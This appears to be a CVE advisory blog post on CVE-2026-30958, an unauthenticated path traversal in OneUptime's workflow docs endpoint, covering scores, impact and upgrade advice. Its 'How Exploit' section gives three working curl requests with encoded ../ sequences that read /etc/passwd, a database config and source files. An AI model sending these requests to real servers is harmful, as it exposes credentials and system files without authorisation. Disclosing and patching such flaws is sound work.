OneUptime, Path Traversal, CVE-2026-30958 (HIGH)

Listen to this Post

The vulnerability, identified as CVE-2026-30958, resides in OneUptime versions prior to 10.0.21. It is an unauthenticated path traversal flaw located in the `/workflow/docs/:componentName` endpoint. The issue stems from insecure coding practices in the file Worker/FeatureSet/Workflow/Index.ts. Specifically, the `componentName` parameter, which is taken directly from the user’s request URL, is concatenated into a file path without any sanitization. This unsanitized path is then passed to the `res.sendFile()` function, which reads and sends the file’s contents. Because there are no authentication checks on this endpoint, an unauthenticated attacker can exploit this by supplying a crafted `componentName` value containing `../` (dot-dot-slash) sequences. By traversing up the directory structure, the attacker can break out of the intended documentation directory and read arbitrary files from the server’s filesystem, such as configuration files, source code, or system files. This vulnerability is fixed in version 10.0.21.

dailycve form:

Platform: OneUptime
Version: before 10.0.21
Vulnerability : Path Traversal
Severity: HIGH
date: March 10 2026

Prediction: Already patched (10.0.21)

What Undercode Say:

Analytics:

The vulnerability has a CVSS v3.1 base score of 8.6 (HIGH) according to NIST NVD analysis, with a vector of AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N. This indicates the attack is over the network, requires low complexity, needs no privileges or user interaction, and can cause a scope change with a high impact on confidentiality .
The GitHub CNA assigned a slightly lower score of 7.2 (HIGH) with a vector of AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N, which also notes a low impact on integrity in addition to confidentiality .
SSVC (Stakeholder-Specific Vulnerability Categorization) analysis shows the vulnerability is `Automatable` and has a public `PoC` (Proof of Concept), increasing the urgency for patching .

How Exploit:

The exploitation is straightforward and requires no authentication. An attacker sends a GET request to the vulnerable endpoint with directory traversal sequences in the `componentName` parameter.

Example: Reading the /etc/passwd file on a Linux-based OneUptime server
curl "http://<target-oneuptime-server>/workflow/docs/..%2F..%2F..%2F..%2Fetc%2Fpasswd"
Example: Reading the main app configuration file (assuming a common path)
curl "http://<target-oneuptime-server>/workflow/docs/..%2F..%2F..%2F..%2Fapp%2Fconfig%2Fdatabase.json"
Example: Reading the source code file containing the vulnerability itself
curl "http://<target-oneuptime-server>/workflow/docs/..%2F..%2F..%2FWorker%2FFeatureSet%2FWorkflow%2FIndex.ts"

The server, in vulnerable versions, will return the contents of the requested file if the user has read permissions .

Protection from this CVE:

  1. Upgrade: The primary and most effective protection is to upgrade OneUptime to version 10.0.21 or later .
  2. Patch Management: Immediately apply the latest security patches as provided in the official GitHub release .
  3. Workaround: The official security advisory does not list a direct workaround. If upgrading is not immediately possible, a Web Application Firewall (WAF) rule can be implemented to block requests to the `/workflow/docs/` path that contain path traversal sequences like `../` or its URL-encoded variations .

Impact:

Successful exploitation of this vulnerability allows an unauthenticated remote attacker to read any file on the server filesystem that the OneUptime process has access to. This can lead to:
Information Disclosure: Exposure of sensitive system files (e.g., /etc/passwd), application source code, and critical configuration files containing database passwords, API keys, and other secrets .
Lateral Movement: Exposed credentials can be used to pivot to other internal systems or databases.
Further Attacks: Reading source code allows attackers to find other vulnerabilities or logic flaws to chain for more severe attacks, such as Remote Code Execution (RCE).

🎯Let’s Practice Exploiting & Learn Patching For Free:

Sources:

Reported By: nvd.nist.gov
Extra Source Hub:
Undercode

🔐JOIN OUR CYBER WORLD [ CVE News • HackMonitor • UndercodeNews ]

💬 Whatsapp | 💬 Telegram

📢 Follow DailyCVE & Stay Tuned:

𝕏 formerly Twitter 🐦 | @ Threads | 🔗 Linkedin Featured Image

Scroll to Top